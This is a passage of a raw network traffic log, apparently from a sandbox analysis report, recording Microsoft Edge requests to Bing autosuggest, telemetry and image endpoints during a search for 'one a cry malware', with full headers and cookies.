cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a129
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20&cp=10&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20&cp=10&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2640
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a12a
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry&cp=9&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry&cp=9&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1032
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc958804977b4ad77be1a2e0412
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-/v2gDYa48W5WASWyXl+JKHVBleftbRrZXgkm2w3zOXA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a1a0
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048775%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048797%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048825%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048847%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A5%22%2C%22AsResponseLength%22%3A%22642%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048848%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A5%2Cig%3A4864B97B8FC146FFAF9890B5EBA5BD87%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048848%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A6%22%2C%22AsResponseLength%22%3A%22539%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048858%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A6%2Cig%3AF3904CD68B6940708D2F779C9FB061D7%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048858%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cr%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048885%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20%2Ci%3A7%22%2C%22AsResponseLength%22%3A%221015%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048894%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048775%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048797%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048825%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048847%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20ma%2Ci%3A5%22%2C%22AsResponseLength%22%3A%22642%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048848%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A5%2Cig%3A4864B97B8FC146FFAF9890B5EBA5BD87%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048848%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20m%2Ci%3A6%22%2C%22AsResponseLength%22%3A%22539%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048858%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A6%2Cig%3AF3904CD68B6940708D2F779C9FB061D7%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048858%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cr%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048885%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20%2Ci%3A7%22%2C%22AsResponseLength%22%3A%221015%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048894%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 539
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc920c34a87878f9c952a4175eb
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-3AI7CNxNG+LhoQ8Qodt/mWgNY5pXDXxX96tzM5O/IbU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a1ba
GET

https://www.bing.com/th?id=OSK.zUMRcIX9URw0KSKHlirktfbd1ucXzqNAfHa1QfGC9yk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.zUMRcIX9URw0KSKHlirktfbd1ucXzqNAfHa1QfGC9yk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 517
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc932024660b622bf565ceae97d
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ctOUBkMey4/bFXZVsto/SCJAX/x6j3VUdBMI9E0ofY4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a1dd
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cr&cp=8&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cr&cp=8&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
